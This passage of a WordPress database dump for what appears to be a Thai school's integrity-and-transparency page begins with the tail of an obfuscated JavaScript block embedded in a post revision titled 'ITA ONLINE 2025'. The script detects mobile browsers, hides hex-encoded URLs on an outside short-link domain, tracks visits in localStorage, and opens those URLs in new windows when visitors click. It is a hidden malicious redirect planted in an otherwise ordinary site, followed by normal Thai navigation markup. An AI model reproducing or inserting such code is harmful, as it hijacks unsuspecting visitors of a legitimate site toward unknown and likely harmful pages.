_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 09:23:23','2025-07-01 02:23:23','',871,'http://pakhaeng.ssk.in.th/?p=1494',0,'revision','',0),
(1495,1,'2025-07-01 09:23:29','2025-07-01 02:23:29','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a>และอำนาจหน้าที่</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" 